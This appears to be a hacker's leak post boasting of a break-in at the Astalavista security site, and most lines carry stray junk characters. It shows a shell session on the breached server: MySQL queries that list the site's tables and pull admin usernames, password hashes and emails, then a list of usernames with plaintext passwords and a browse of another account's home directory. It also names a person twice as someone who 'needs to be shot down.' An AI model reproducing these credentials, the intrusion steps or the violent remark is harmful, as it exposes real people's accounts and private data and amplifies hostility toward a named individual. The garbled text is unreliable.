% V/ u( c; y p. Q% h! j7 ]; v! B <docs>http://blogs.law.harvard.edu/tech/rss</docs>2 s8 x( @, I# k
<generator>Astalavista.com</generator>7 [& G+ s+ _+ U/ B+ Y' c! r: P
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘+ W7 X# ^ W8 c# n5 S @- |) Y
</channel>7 t' z- C3 a: v$ F
</rss>’;
" N9 N ]" c( ~! K: d: ?# e* z \, u0 D, a* w( g
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) { V0 ? G- r; ^+ n
unlink (FULLPATH . ‘/feed/exploits.xml’);
6 D/ s3 b9 ^/ E7 i }$ S& F2 u6 d# s* V7 r3 d) y
! Z% e( a0 U7 A/ K8 d. O8 G1 o file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
& @8 z' }* S5 t# ~* z2 D* n[snip]
1 s1 f+ }2 d& I8 N k2 R
) k0 E. b3 ]3 @, k/ H e. ?8 P1 M* jsh-3.2$ cat exploits.sh
: {/ Z! U# t# j9 n& y#!/bin/sh y, q0 _% w A
+ z( o* a( u8 C, U; a0 A
###########################################################3 c+ O7 T2 I R7 l4 H/ G# D$ ^
# #! y8 | c0 o& S% h* p3 J
# Title: milw0rm exploits adder #
2 ]1 c# t& K0 ]7 o, F# Description: Add all milw0rm exploits to the #
# u1 d1 A; b0 |, b# Astalavista.com database #
. K2 w5 i* P; |* g# P5 H# #9 K; X4 M2 U; Q, k7 Y1 C+ X0 f
# Company: Astalavista Group #" g& [. e* J* T5 v: v: K. W8 g8 c4 c
# Author: Paulo M. Santos #) L" _! F: a( K1 \- s
# E-Mail: 链接标记paulo.santos@astalavista.ch #
( S A1 Q4 Z( H) F2 \# #" [3 p; h6 f1 I" y7 j, P- _
###########################################################
+ h* e! N& a) }) r, B' |/ s! N+ ~/ v
# path4 s3 b5 P; f9 P: w# Q6 W# k) R
this_path=/home/com/public_html/modifications/cronjobs
% x! \5 z7 ^ ~) ?; j0 Q7 y( K( n3 C3 z
# change directory
0 }" i7 Q' A3 |: ~0 Ccd $this_path* ?' I8 X( S; N/ U
cd tmp/
, v2 l# W4 F$ ]+ c3 p7 B# c) R4 b. t. h
# delete files
1 c1 U: r) w" zrm -rf milw0rm.tar.* &
6 i9 U H* }; Jrm -rf milw0rm/ &
7 Z" c3 l) M- ^
. ~0 _) h# P2 T5 s q: V# wget milw0rm paket
% b) M( W7 s, U2 h6 _2 `2 ewget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
: ]$ J7 h$ N' h. C }' W4 R% u- G* b2 m
# extract milw0rm paket! U7 ~# e2 b# W& c% {# i4 P4 v6 b
tar -xvf milw0rm.tar.bz2$ n: k* X' ]" M: D, U$ [7 a
2 b8 i' |/ c& k2 X% x# change owner
& V- F* Y1 R9 L5 f! v& achown -R com .
+ g2 c8 S4 I8 D$ ^5 F* K4 cchgrp -R com .; Z4 X0 h' l& X- w6 j) h
# a5 t8 x) b# r% M% I# execute php script
( C0 z5 X& ~- [cd $this_path
1 y ~' s' ~& bphp -q exploits.php
: R w4 q7 O9 \ n. }5 C( M& T! M/ M, D$ Z% v' h7 X" P
# delete files4 `4 e- W+ r( g7 }/ T$ @$ A# u
rm -rf tmp/milw0rm.tar.*
4 C3 }; X9 {0 |+ Rrm -rf tmp/milw0rm/- B, ~# L( A0 L( o, s* K4 v
; T+ v/ _( L5 p- ~/ o% P' J* R
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”* b6 l& G- N& }) g6 N2 B
Paulo M. Santos needs to be shot down.
# T- y. d4 k7 j% s, c/ V
+ o( \' e7 g+ \4 N/ E. J+ Jmysql -u contrexxuser2 -p& d3 H) ]; h8 C# r7 Y. l# d
Enter password:
! v; t, O( P! H" ]; m8 GWelcome to the MySQL monitor. Commands end with ; or \g.9 k6 @" A2 r, I6 [
Your MySQL connection id is 261694
2 a q; v* v2 GServer version: 5.0.45-community-log MySQL Community Edition (GPL)
+ P5 I9 ^, w7 p$ w( C6 v0 S: R3 f2 u. @/ w* P( ?# c" f
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
& e& h6 [; Y: a/ a6 L
$ A% ]. a) v! {% c: B6 pmysql> show databases;
0 s9 Q+ q |& d0 X+——————–+
; h3 m4 `- t8 f" Y6 T| Database |1 f2 I$ ~. x1 K; W9 g
+——————–+9 ?1 e; g7 z2 Z* X& J! R
| information_schema |+ H$ C: P& m) s. K% O( a. ~
| com_contrexx2 |
; V4 U8 a4 h9 W. w- O8 \1 e# T| com_contrexx2_live |
* l. a1 U5 ~6 ?+ k3 H8 ?| test |
9 h Y7 V/ q. L! y+ ] U+——————–+
9 [% H* V* ]/ S. n4 rows in set (0.00 sec)
% R' K1 s/ c0 _
3 f8 K) u" i6 {$ L2 ~mysql> use com_contrexx2_live9 l/ e, e: E. J" v
Database changed
6 ^ D( u: d! i3 Cmysql> show tables;
! I# Y3 B3 u& Q, W& \ V+————————————————–+- @" `" `; W, W1 `) ~
| Tables_in_com_contrexx2_live |
9 H' h* i. S& m! d U( j8 O0 g* W+————————————————–+7 c' L) W& m/ u4 i9 h1 `
| cc_banner_counter |
1 J5 y( A3 k4 v' y- K; \& G| cc_search_counter |
' N9 m* Y7 i$ N| contrexx_access_group_dynamic_ids |9 H! ?3 E4 H& Q L5 ?+ h f' i9 z8 d) k
| contrexx_access_group_static_ids |
% C5 m" Q7 e2 u D8 [7 Z3 @| contrexx_access_rel_user_group |
6 c! e9 o" f, N2 b4 I. {| contrexx_access_settings |
% Q9 g- ]8 E$ U" _$ _| contrexx_access_user_attribute |9 C. W0 M6 F( r7 ]
| contrexx_access_user_attribute_name |
! A: n( {8 r- }* f| contrexx_access_user_attribute_value |2 R( {3 _, n* N, D) v0 V8 F
| contrexx_access_user_core_attribute |
: u. `2 w, c% I- O| contrexx_access_user_groups |' h3 E/ l8 M& b$ P) }+ d1 c
| contrexx_access_user_mail |
4 B- d4 @# ]4 o$ x8 t| contrexx_access_user_profile |
( @ A# o8 B' P7 q" \| contrexx_access_user_title |, Z" W1 l! K* C) |# _
| contrexx_access_user_validity |
1 z- `, \1 u+ ~8 ~1 Q6 _; z. W| contrexx_access_users |
5 Y" j' w/ Q8 v( T9 S| contrexx_backend_areas |
& j( w! Y( d6 E! E) Z) q| contrexx_backups |
( T6 g5 Z, D9 l1 P| contrexx_content |& ?8 ]; q6 P4 u: C$ Y6 z0 Z# M
| contrexx_content_history |
' k% D, K4 J! n/ ]+ i" I| contrexx_content_logfile |
. C' [5 t+ {* g0 [2 m+ U+ }: P1 c| contrexx_content_navigation |
9 o$ O) W9 d; G| contrexx_content_navigation_history |
* s0 X1 b+ ]. i8 c+ J4 I+ J| contrexx_ids |
$ a/ C: Z/ L: U# F# r n| contrexx_languages |* E- p3 h. f; U+ \% l% [
| contrexx_lib_country |. q& e. V( m( B) I b) v
| contrexx_log |1 u0 x4 M8 R6 _9 ?. }6 n
| contrexx_module_alias_source |
/ ]1 w) J: c. {+ }/ X| contrexx_module_alias_target |
* Z3 z0 @. D* d/ }| contrexx_module_block_blocks |
2 C. }. L; D7 e& e/ D: ^& G8 S& e| contrexx_module_block_rel_lang |1 j) O- ?1 u$ G$ w
| contrexx_module_block_rel_pages |
$ N( U! W' p2 E* \# a% x5 i| contrexx_module_block_settings |% M& B7 o" k X
| contrexx_module_blog_categories |
# E1 d# |/ q' R7 |/ O z| contrexx_module_blog_comments |
, X! O- }7 o I6 \| contrexx_module_blog_message_to_category |
- h, [) x: w/ T9 j| contrexx_module_blog_messages |
6 e+ j7 j, \; W; n. L7 l| contrexx_module_blog_messages_lang |
: V! m7 z7 z4 i4 H| contrexx_module_blog_networks |
- v. X9 F4 [6 v. q9 I( b. m7 [| contrexx_module_blog_networks_lang |+ G1 J, j$ e$ i4 L' ^' v
| contrexx_module_blog_settings |
3 U( D1 s" |' l) y; i0 c| contrexx_module_blog_votes |) c& e" y; m$ |+ R' o
| contrexx_module_calendar |
1 `& | q }5 }0 }| contrexx_module_calendar_access |
9 B9 z( V F( k+ O9 x$ A6 m| contrexx_module_calendar_categories |7 x; [8 e" b6 |" Q0 k0 T# ~& [6 [" k
| contrexx_module_calendar_form_data |/ u& ~6 X' e- j( y! ^) _
| contrexx_module_calendar_form_fields |+ b$ j+ s* [0 K8 @
| contrexx_module_calendar_registrations |
" x3 F$ N/ J5 j- W) B, ^| contrexx_module_calendar_settings |* u# S2 e4 F6 i
| contrexx_module_calendar_style |7 A6 z3 y5 M. s
| contrexx_module_contact_form |
+ i! h; q: ]3 C3 k4 a1 g) U. M| contrexx_module_contact_form_data |
4 s2 ^4 q$ B/ X8 R, D* \, R6 ?' {| contrexx_module_contact_form_field |9 }8 o5 w' P# m4 d' |. _3 D0 a
| contrexx_module_contact_settings |4 d* T, r: S5 X! e+ s" R' F
| contrexx_module_data_categories |/ N# Z. r' c" A: z
| contrexx_module_data_message_to_category |' k8 p* [$ x) ~6 s: l) m7 k- F
| contrexx_module_data_messages |
7 {" ~( k7 L, y( v+ `6 y! Q+ R| contrexx_module_data_messages_lang |
: k8 g/ d8 l8 E. n2 E. C4 K0 A| contrexx_module_data_placeholders |4 C$ f+ V) k$ N! {" s
| contrexx_module_data_settings |
" ?7 Q; [8 w4 V7 H4 l! e' D$ k| contrexx_module_directory_access |- U2 n' b( Y$ @ Z
| contrexx_module_directory_categories |3 e2 S7 d/ P* \: Y3 } i- X: _8 A
| contrexx_module_directory_dir |; M- R) z+ V$ D* N; [
| contrexx_module_directory_inputfields |, S/ X }5 k4 {: @ B3 b
| contrexx_module_directory_levels |
$ C, D4 @$ x( v0 C2 C. B$ J B| contrexx_module_directory_mail |
6 J7 i' c2 c0 f6 r+ [| contrexx_module_directory_rel_dir_cat |
$ S% @& U# f# R' O7 L6 [3 H: f& u| contrexx_module_directory_rel_dir_level |" i$ p9 ? N5 M l1 t# q. r
| contrexx_module_directory_settings |1 U; n. c" Z: ], y; [ i. F {) I
| contrexx_module_directory_settings_google |7 |7 X( y, A% r4 F8 ~3 W }
| contrexx_module_directory_vote |
/ j$ S6 Q8 p6 D5 U| contrexx_module_docsys |- W2 `& \' z* e n; l# |4 D5 e
| contrexx_module_docsys_categories |
5 K' I1 ]. o* U% F' p3 c| contrexx_module_egov_configuration |
6 {- o+ _7 f" c. s: z0 [| contrexx_module_egov_orders |
; z2 e: O& M* U6 K. A| contrexx_module_egov_product_calendar |
5 `# o8 @* _& ~8 |2 F0 g2 A| contrexx_module_egov_product_fields |/ J+ Q' D: c1 I# [) a- [
| contrexx_module_egov_products |, t6 k: C3 t6 P3 E9 I
| contrexx_module_egov_settings |
2 E# A% ^5 ]* v* r| contrexx_module_exploits |
0 N# {1 r2 s! q: h/ l% y- Z! e| contrexx_module_exploits_categories |
* j' r* J' i' a q6 M2 A9 k9 ?1 D| contrexx_module_feed_category |$ U& a6 n1 W r) g. D0 |, R
| contrexx_module_feed_news |
- ~ E7 \& o5 c$ d! Y| contrexx_module_feed_newsml_association |; c+ _% X6 T. n0 v% y B) E, e1 y
| contrexx_module_feed_newsml_categories |1 d8 o# `0 q6 o* X1 o; Q
| contrexx_module_feed_newsml_documents |" l0 ?$ S; j% r" }/ M
| contrexx_module_feed_newsml_providers |
4 R+ D! [& y3 T) u8 R| contrexx_module_forum_access |2 g( ~% w! Y! H, H# B
| contrexx_module_forum_categories |
& h* V6 y0 V: P| contrexx_module_forum_categories_lang |( T0 ]0 x1 _5 F6 Y
| contrexx_module_forum_notification |) U( F8 N5 X( H/ ?
| contrexx_module_forum_postings |) m" D; M3 ]; H$ V
| contrexx_module_forum_rating |
, d$ o* I/ n' F# {# l% \0 B3 A7 o: P| contrexx_module_forum_settings |
2 U! t2 g" `5 I# k0 T* y# E, x* C| contrexx_module_forum_statistics |, c$ N' _9 o2 J1 {& \/ c
| contrexx_module_gallery_categories |
' k$ W6 u) l- n7 L| contrexx_module_gallery_comments |
& D( V0 s& t& s% U* \/ C4 V| contrexx_module_gallery_language |3 S" k0 z4 A# z$ H3 _$ x
| contrexx_module_gallery_language_pics |2 Y- |4 k l$ w7 z- t
| contrexx_module_gallery_pictures |0 m: X+ N, l7 v
| contrexx_module_gallery_settings |( a; q% x* g: K! h' Y
| contrexx_module_gallery_votes |
5 S( L2 @ w! H/ }* l$ `4 q! W| contrexx_module_guestbook |+ N5 K J- j& I) B. y L* l) E' z h' L
| contrexx_module_guestbook_settings |/ T8 F; O1 `; ]4 W# S0 }
| contrexx_module_livecam |( c1 b; X! F9 f" T1 u4 ~
| contrexx_module_livecam_settings |# r0 Q5 l7 r7 D2 G5 X
| contrexx_module_market |
8 M; V" x5 W8 E: G/ d8 m| contrexx_module_market_access |! ]$ A8 u5 Q8 @% g7 z
| contrexx_module_market_categories |
* y+ U( F) m% W+ E1 E6 u+ @. Y' Y| contrexx_module_market_mail |4 ]$ M$ ~8 C( S& j
| contrexx_module_market_paypal |
! k, j+ I. k: a/ l* l; h" H| contrexx_module_market_settings |
: z3 M% \. G$ C| contrexx_module_market_spez_fields |! Q( T8 O# O E
| contrexx_module_mediadir_access |
6 v5 }3 R, m. [| contrexx_module_mediadir_categories |8 s' j% {& y* E. Q4 {' l
| contrexx_module_mediadir_comments |; T& f. V+ K2 i. g3 u/ Y
| contrexx_module_mediadir_dir |8 i7 p( ^+ s- N# R% `
| contrexx_module_mediadir_inputfields |
, {2 x7 k7 q: {# n* Y3 h$ q| contrexx_module_mediadir_levels |7 o2 g4 _8 i* y5 q
| contrexx_module_mediadir_mail |
0 z! b) I) D( w& S, M| contrexx_module_mediadir_rel_dir_cat |
9 b3 ]# U2 n" ?" ?2 D1 B| contrexx_module_mediadir_rel_dir_level |+ n7 F# i, D( g$ m, I
| contrexx_module_mediadir_reports |
5 b) U5 v8 k4 S6 R! w; A1 Y| contrexx_module_mediadir_settings |6 ]7 ~' R3 J0 X# c: k$ T* g
| contrexx_module_mediadir_settings_google |6 l. s A) t. N7 _& @
| contrexx_module_mediadir_vote |
6 S; Z: j$ _7 W( ]' N7 X9 t| contrexx_module_memberdir_directories |1 ?7 e9 g7 Q; i7 _( `
| contrexx_module_memberdir_name |
$ _2 b/ n3 ^" p/ f1 i X| contrexx_module_memberdir_settings |6 N% |0 X5 U$ X" x4 y! w
| contrexx_module_memberdir_values |
. E6 K$ R# J8 a1 r2 P7 g| contrexx_module_nettools_allowed_groups |% A7 v2 W* d" d! y
| contrexx_module_nettools_settings |
7 ~8 o3 g" i; H; F6 || contrexx_module_news |1 V. q2 A% |. R# U3 a8 d
| contrexx_module_news_access |
; C9 \8 c, U3 c3 @| contrexx_module_news_categories |% p4 K5 K& {# |. e, }' d S" B
| contrexx_module_news_settings |
4 e8 D( ?6 |' Q| contrexx_module_news_teaser_frame |
: K( F# S- J5 @+ y| contrexx_module_news_teaser_frame_templates |
" A a( X# C; N$ U. o1 v| contrexx_module_news_ticker |
: }; C) G/ w9 O, P; ~/ W| contrexx_module_newsletter |
- z% p3 G" k3 I| contrexx_module_newsletter_attachment |' y8 m4 @) A" G- U( b9 d
| contrexx_module_newsletter_category |
) X( n# L2 h: P( Y5 F: F| contrexx_module_newsletter_confirm_mail |' n7 n7 W- C, d0 \5 v
| contrexx_module_newsletter_rel_cat_news |' y5 v' B/ O' _
| contrexx_module_newsletter_rel_user_cat |
8 i" J+ w2 y4 ]2 w| contrexx_module_newsletter_settings |
2 J# q8 I3 f O! W" L" ]| contrexx_module_newsletter_template |
, S9 q! P7 X; g( ]| contrexx_module_newsletter_tmp_sending |
% c8 J9 h; U/ M; T( K1 m6 i* S1 O# F| contrexx_module_newsletter_user |5 H( \+ w6 o( w4 z9 b9 c% U
| contrexx_module_newsletter_user_title |, B8 r+ m( y S$ a7 r4 {! L0 [
| contrexx_module_onlinetools_defaultports |
% i& _! x+ E1 P; A) m* b" @1 d| contrexx_module_onlinetools_defaultports_back |
3 |" f& K: g$ a6 Y3 D| contrexx_module_onlinetools_geolitecity_blocks |4 Q, t; G8 B" l- g
| contrexx_module_onlinetools_geolitecity_country |
1 U( n: Q1 n9 s) @| contrexx_module_onlinetools_geolitecity_location |9 y( C! `$ @4 f/ @: w+ Z
| contrexx_module_podcast_category |( f5 D0 R8 ^. M9 n
| contrexx_module_podcast_medium |
, L4 I* n- D2 q4 [7 k* G4 ~| contrexx_module_podcast_rel_category_lang |
" d0 G* S0 Q! t. `* `8 ]" || contrexx_module_podcast_rel_medium_category |8 _ k! u0 D+ Y( u) I% A W- s4 C( v
| contrexx_module_podcast_settings |! ?' K6 J9 P; j' N; W2 a
| contrexx_module_podcast_template |
3 o& r0 \1 V8 }( {- A4 M| contrexx_module_proxydb |2 a7 G5 c* B3 S) O) H
| contrexx_module_recommend |9 @) k/ ~ L: F. u" s: T; u% z
| contrexx_module_repository |
2 F: v5 ?8 V" o; j' e* y| contrexx_module_securitynews_cats |
) V: V; o, d7 s% e| contrexx_module_securitynews_feeds |& G5 p. k7 O+ n! u
| contrexx_module_securitynews_news |
1 ]1 M" C% G% e1 }6 X$ c1 Q| contrexx_module_shop_categories |
! e- C' V! ^& F- Y4 J$ _1 }| contrexx_module_shop_config |
9 g. n% f; S& _) s. I' s| contrexx_module_shop_countries |) p* x7 q( D4 P4 O6 m# k! }4 L; H
| contrexx_module_shop_currencies |3 p- h* L# _ \( Q3 n
| contrexx_module_shop_customers |
& K% e F6 E W' q! B* @| contrexx_module_shop_importimg |' ?4 Z- r) D2 v, R5 K1 Q
| contrexx_module_shop_lsv |% |4 W8 [7 @' T9 W ]3 m
| contrexx_module_shop_mail |
' c! m, r9 I8 m9 J3 N| contrexx_module_shop_mail_content |' Y! t6 N3 C6 k3 F2 r
| contrexx_module_shop_manufacturer |& N5 q$ V+ e7 i6 y4 v, V
| contrexx_module_shop_order_items |
8 P% x" c+ p+ H4 l| contrexx_module_shop_order_items_attributes |, d5 Q1 [% i t- F8 d* c4 }
| contrexx_module_shop_orders |
0 g3 B5 U+ ^* R3 P| contrexx_module_shop_payment |
3 w6 l+ c* h* S) R% T" J| contrexx_module_shop_payment_processors |
, o% |7 ?9 _3 b! ~* J| contrexx_module_shop_pricelists |% c7 h) b8 G8 Q* i* B# ^
| contrexx_module_shop_products |2 o% B; H P6 H2 i
| contrexx_module_shop_products_attributes |8 _8 L+ {4 {% G& k Q/ S0 E) G
| contrexx_module_shop_products_attributes_name |
5 k; X* t/ ]; O) @- {$ t| contrexx_module_shop_products_attributes_value |
, L l4 c* a4 a/ h% F| contrexx_module_shop_products_downloads |& {# {$ ?. G2 w
| contrexx_module_shop_rel_countries |
0 `9 r6 j6 v0 D6 v. R6 y' m" _| contrexx_module_shop_rel_payment |
3 h$ y- {4 c G, C B M" n| contrexx_module_shop_rel_shipment |
# m: l6 h2 Z* Y+ L4 H| contrexx_module_shop_shipment_cost |
% P: Y# I3 s/ k* G| contrexx_module_shop_shipper |
# v: s0 o- ?9 }5 G; A9 V2 Y| contrexx_module_shop_vat |
8 x; D, U$ c X2 P, G. E| contrexx_module_shop_zones |8 z3 b( `6 L: j: z' A
| contrexx_module_u2u_address_list |, B& I4 R& p5 |4 }& v5 N) S
| contrexx_module_u2u_message_log |
" \. E& ?2 u9 {% R| contrexx_module_u2u_sent_messages |
. ], n, a7 E& {" u4 f| contrexx_module_u2u_settings |
+ D# E5 d5 W. g2 g$ f4 F4 R| contrexx_module_u2u_user_log |
2 V# H5 T: B8 v) Z- b D| contrexx_modules |9 x* ]8 e' ^ J! i
| contrexx_sessions |7 h1 H7 h0 Y Z3 ~8 z
| contrexx_settings |2 U, T Y0 G9 f9 _8 {! f
| contrexx_settings_smtp |
L/ `1 T. O2 \3 L" q, z5 T| contrexx_skins |5 o4 W5 o- p% q
| contrexx_stats_browser |3 Z. X) O4 {4 b4 D
| contrexx_stats_colourdepth |" ^" r+ O/ B H( b
| contrexx_stats_config |) s% ?6 k* s1 ?: h& ` g- s& R
| contrexx_stats_country |3 X8 s" R9 N) C! S% k
| contrexx_stats_hostname |
( D9 I$ B* e% d, P7 A- Q* T| contrexx_stats_javascript |
; s6 j. F- ^, V( I1 || contrexx_stats_operatingsystem |8 C, ^! `; s$ F7 k' w
| contrexx_stats_referer |
! A2 _+ O. v2 F- q5 r4 |" A* _| contrexx_stats_requests |
9 |0 f" p, ?+ o% r* C0 ?8 m: S F| contrexx_stats_requests_summary |5 z6 l+ w9 s% O# \' I
| contrexx_stats_screenresolution |
- s. m" |3 O' e# X5 ^% @. ^( ^| contrexx_stats_search |6 C+ P0 X. {, z/ r6 ~
| contrexx_stats_spiders | ~0 Q* W4 n2 T# ^/ {, V7 ]" A
| contrexx_stats_spiders_summary |2 V& B1 w/ V" s
| contrexx_stats_visitors |3 d$ b$ e. ~# r: X2 D2 J( N5 E
| contrexx_stats_visitors_summary |
6 z! Z3 L2 ^! H( {: W* }5 J| contrexx_voting_additionaldata |3 ^9 o* y1 U' P
| contrexx_voting_email |
: v; ~8 R1 b+ X0 w% H| contrexx_voting_rel_email_system |& X4 {2 K+ {( y, a4 \
| contrexx_voting_results |
3 |% x7 @4 Y( v6 |2 F| contrexx_voting_system |% D( c0 _; q$ |0 c7 w9 |3 W7 L
| foo |
H% m s7 M) w" q# I/ P+ `9 ]+————————————————–+
" p. f+ D3 i/ V7 s227 rows in set (0.01 sec)
. }" x- A7 G& s! Z( ~* T. o
9 k# A) T I% K: \% W; O9 |6 Qmysql> select count(*) as skids from contrexx_access_users;
5 `, V+ T- B' U" T+——-+
$ Q7 K, s, X. g. E" n+ y7 x| skids |0 h& ], A$ g2 P* `; E$ E( Y l
+——-+
3 ]% G! U" ^5 o5 _| 53699 |8 ]) V+ A# l k* a' O
+——-+ c$ D" a5 L% E1 Q9 Z2 f" ?
1 row in set (0.00 sec)- I6 M/ j" W5 ], X" n7 r1 {
7 v0 n7 p7 L+ Y/ [
mysql> describe contrexx_access_users;
$ T" K0 c( z F+——————+——————————————+——+—–+————–+—————-+
4 B+ H" _3 `3 c) Y- X; n% P| Field | Type | Null | Key | Default | Extra |4 j7 W! Q C* v& \( O7 Q
+——————+——————————————+——+—–+————–+—————-+
$ {" T& \; B3 ?9 a| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
1 W* l) D+ h0 r3 n2 f' Q* v' y| is_admin | tinyint(1) unsigned | NO | | 0 | |- `; W/ l$ z2 |7 N3 M
| username | varchar(40) | YES | MUL | NULL | |
8 c# A6 B& s4 m1 @+ J| password | varchar(32) | YES | | NULL | |
/ R# i' Y- Y: Y6 k+ Z4 v7 s| regdate | int(14) unsigned | NO | | 0 | |
3 F8 o5 x1 R# Y& _$ ~7 u| expiration | int(14) unsigned | NO | | 0 | |
1 o `- _9 E7 y, s6 x| validity | int(10) unsigned | NO | | 0 | | S% ?4 F Z3 y; Q4 [; f
| last_auth | int(14) unsigned | NO | | 0 | |" ]6 M3 f' y$ e
| last_activity | int(14) unsigned | NO | | 0 | |
9 j5 q, P% U8 W" V2 l1 m| email | varchar(255) | YES | | NULL | |: T8 ^) V9 O, J2 w$ p8 G9 w
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
" V' H. Z: G9 ?2 C5 S| frontend_lang_id | int(2) unsigned | NO | | 0 | |+ `) `5 {3 T; Q" e/ A$ E
| backend_lang_id | int(2) unsigned | NO | | 0 | |# r3 J" [- x' [/ q& [" z/ R" z
| active | tinyint(1) | NO | | 0 | |
# A9 }3 n" a+ ~6 g9 u0 i| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |* z7 G; R6 Y7 f1 b2 o
| restore_key | varchar(32) | NO | | | |
" i; Z. b7 S3 P$ v' B: u, R9 y9 A| restore_key_time | int(14) unsigned | NO | | 0 | |
* g' ^* c2 E9 Z% D6 k| u2u_active | enum(’0′,’1′) | NO | | 1 | |8 z4 \$ D4 c7 L* n) z
+——————+——————————————+——+—–+————–+—————-+' i) W/ A( C1 X) F5 w5 N: o
18 rows in set (0.00 sec)+ N0 Q2 c5 J* g# z d
$ l- A7 a! a. W" b1 [mysql> select username,password,email from contrexx_access_users where is_admin = 1;% V, ]% T7 x' W
+————+———————————-+—————————–+. U* g3 V+ B% }7 V5 u+ S+ S* ?( P
| username | password | email |
5 C R D$ O% x; l# a+————+———————————-+—————————–+ t h6 b! W5 M! u* `6 N4 |( w9 `% a" d
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |3 L7 Y6 m: g+ |4 R
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
' E0 v# W+ H4 ]| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
+ Z. @1 k$ o# e4 T/ J| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
, W( k$ }5 A5 I# H. `2 t2 D+————+———————————-+—————————–+
+ U+ V3 G. r: S# Q4 rows in set (0.04 sec)
/ k0 Z, P- _5 s& ^) P- d
8 H7 Y9 C1 n% f& Hmysql> exit;" f1 O. i7 L! B. B4 z9 n. e
Bye
' S- v3 ? [$ Y4 Q6 X% u9 ]
3 T& Z7 ?$ Y/ |% }+ e+ k0 n[~] There you go, your “team of security and IT professionals” is a joke.
4 a6 i6 s- r. Z7 c- e9 Z0 t
! A, P! {2 I1 `$ F! v2 u+——————————+
' ?4 }$ z5 j$ u$ Wsystem:f82BN3+_*
& v0 D$ {( {* \' m5 S( TBe1er0ph0r:belerophor4astacom r. o* t0 j" c; N+ h' b% w" z6 Z
prozac:asta4cms!
; Z( r4 N. ]3 q0 J' o/ Fcommander:mpbdaagf6m+ q7 C" f) M: f
sykadul:ak29eral' r& f5 ?, c) F" ] c
+——————————+
4 _4 t/ H& w. Q+ D7 w6 T( J
9 N* ?4 Q# @, { g' s6 t4 u2 ^# ?[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)3 w! B: ~2 e6 P2 Z& b. [
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.# I9 B: f8 I v9 u3 [. U
" y6 l$ I- L: t( E' `
[~] Lets move to astalavista.net now,
: f9 ?9 A3 m% M. \0 J; L/ Q$ d2 I {# d4 F4 ~% @
From <链接标记[url]https://www.astalavista.net/[/url]>:
9 Z, a! x( U9 w+ t# P5 D7 T>> Everyone knows that the best defense is a good offense./ v) y( s* Q, e0 ?
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
" j; `% T. g H; _$ o>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
# R- U0 N! a( t$ x. I>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”( o1 f% V: Q7 z1 Q1 j8 G
2 T6 ]+ R# P4 ?2 n* q>> Go ahead, try and hack our server . in a completely legal way!0 g H* v6 f, f" o; m# ^
>> Learn by doing: We offer our members tricky tasks and challenges on an1 }6 X9 T% H# R: \) j6 z
>> ongoing basis so you can test your knowledge and abilities. You can also( J2 T- I n' S X$ G. l* R+ _
>> demonstrate what you.ve mastered by taking part in regular hacker contests
' n& V" D) h6 y& E" n2 w3 [( E4 w>> and war games4 I+ z& M8 [) H! _: V5 @" [
( m: u3 R: b Y( x8 G[~] Lets take a look there, after all… they are hack-proof, aren’t they?!# G6 x+ T8 R7 m/ y) f6 k# T
5 p6 j' f. F4 _) `6 f ~
[-] Tricky task: Find home dir of astalavista.net1 K: V2 ^1 P$ ^- i% B; q, n D
- Z2 ~, A& ]" X6 @' Y s F
sh-3.2$ ls -la ~astanet
; u5 f* G0 M( k# J5 g1 Ltotal 482 u h- M) B* L' c( W$ m
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
" g# T0 O. n& T5 ~. v" G' xdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
3 Y u) D5 [; [drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
+ z- l! F7 p( b-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history( ?2 l3 `( R4 P3 s
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout1 J" d: q3 k1 S
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
' j& Q, U C. h+ \( \-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
, P9 ~6 D1 r. Rdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
+ w' m* w* `1 `drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
1 j( X" t! D, ]2 Qdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail O; E) w; d b1 w7 h, A
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
# x- j+ a# r @& t7 k+ O+ k, g-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow" l2 e" `0 [1 G( H2 r
) |) L9 Q* \' d4 N2 ~sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/1 z, B& z' e; v" n5 E
sh-3.2$ ls -la
& }& E4 t/ k( o' u. @: B$ rtotal 200% h; w( v, r- Z* I7 x
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
8 ~% y) G/ D2 L# E) a2 X) m: q" a, Ndrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..& ?8 x( m; ^' c3 n0 D- t) I
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
" W" l( O6 j. w9 p# O7 ddrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql- ^3 A' ]' f' Z% N
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com
